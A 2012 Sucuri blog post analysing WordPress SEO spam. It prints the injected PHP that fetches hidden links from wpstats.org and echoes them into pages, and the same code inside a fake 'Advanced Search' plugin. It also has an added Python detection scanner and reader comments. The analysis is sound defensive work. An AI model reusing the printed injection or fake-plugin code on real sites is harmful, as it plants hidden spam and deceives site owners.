Sucuri Blog

Website Security News

Wpstats.org Spam and a Fake Advanced Search Plugin

May 9, 2012 | Daniel Cid

If you are seeing hidden links in your WordPress site, they could be coming from wpstats.org. In some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists('curl_init')) {
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}

If you are not familiar with PHP, this code contacts www.wpstats.org/jquery-1.6.3.min.js, which returns a long list of hidden links that are then included on your site (not visible in a normal browser).

The plugin

What is more interesting is that they also have a fake plugin called “advanced-search-plugin” that includes those hidden links and a call back to wpstats.org. The plugin does none of what it advertises (advanced search); the description is only there to attract attention and get it installed.

Part of the plugin:

/*
Plugin Name: Advanced Search
Plugin URI: http://searchpluginwp.blogspot.com/
Description: Add a Google style search to your blog where suggestions are made for tags, categories and titles.
Author: Jessica devon
Version: 2.1.2
Author URI: http://searchpluginwp.blogspot.com/

*/
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();
$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);curl_close($ch);echo $data;}}
add_action('wp_head', 'insert_jquery_theme');}

If you have this plugin installed, delete it ASAP! Sucuri SiteCheck should be able to identify those hidden spam links if your site is compromised.
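
As an added example (not code from the original post or from Sucuri), a small Python scanner for the check described above: it flags PHP files that contain the two indicators quoted in the article, or the more general pattern of a hard-coded URL fetched with cURL and echoed unmodified. The function names, the remote-fetch-echoed label and the sample theme tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in the article.
IOC_STRINGS = ("wpstats.org", "jquery-1.6.3.min.js")
# Generic shape of the injection: a hard-coded http(s) URL, a curl_exec()
# result stored in a variable, and that same variable echoed into the page.
URL_ASSIGN = re.compile(r"""\$\w+\s*=\s*["']https?://[^"']+["']""")
CURL_EXEC = re.compile(r"\$(\w+)\s*=\s*curl_exec\s*\(")
ECHO_VAR = r"""echo\s+["']?\$%s\b"""

def scan_php(text):
    """Return a sorted list of findings for one PHP source string."""
    findings = {"ioc:" + s for s in IOC_STRINGS if s in text.lower()}
    if URL_ASSIGN.search(text):
        for m in CURL_EXEC.finditer(text):
            if re.search(ECHO_VAR % re.escape(m.group(1)), text):
                findings.add("remote-fetch-echoed")
    return sorted(findings)

def scan_tree(root):
    """Scan every .php file under root; return {relative_path: findings}."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed theme tree in a temp dir and scan it."""
    infected = ('<?php if(function_exists("curl_init")){'
                '$url="http://www.wpstats.org/jquery-1.6.3.min.js";'
                '$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);'
                '$data=curl_exec($ch);curl_close($ch);echo "$data";} ?>')
    clean = "<?php get_header(); echo $title; ?>"  # constructed clean file
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp, "themes", "sample")
        theme.mkdir(parents=True)
        (theme / "header.php").write_text(infected)
        (theme / "index.php").write_text(clean)
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

The generic pattern is a heuristic: legitimate code that proxies remote content will also match, so treat hits as files to review rather than confirmed infections.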

Categories: Website Malware Infections
Tags: Hacked Websites, Malware Updates, SEO Spam

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. French SEO

    May 9, 2012

    Firefox with URL http://www.wpstats.org/jquery-1.6.3.min.js there is no display of hidden links. Is this normal?

  2. Phelan Riessen

    May 9, 2012

    Thanks for sharing this info. I’ve been on the warpath to find the ultimate WP search plugin. I’m sure I would have stumbled across this one at some point.

  3. josey jasen

    May 25, 2012

    Hey would you mind letting me know which webhost you’re utilizing? I’ve loaded your blog in 3 completely different web browsers and I must say this blog loads a lot faster than most. Can you suggest a good internet hosting provider at an honest price? Thank you, I appreciate it!
    http://www.opencart.com/index.php?route=extension/extension/info&extension_id=6498

  4. Javs Gtr

    August 3, 2012

    I did the following to solve this problem: I downloaded the theme folder (as the problem comes from it)
    I opened Notepad++ (freeware software)
    Clicked on search > search in files
    And where it says “folder” I entered as a path the folder of the theme (this will make a specific search in a whole folder)
    I searched for the name of the false jquery “jquery-1.6.3.min.js”
    and in my particular case, that was in nameofthethemeincludepluginpost.php

    I eliminated the external path and uploaded this file to ftp

    Problem solved!

    Hope it helps

    For any questions, mail me: javs.gtr@gmail.com

  5. LuisK

    January 22, 2013

    Javs Gtr, thank you.
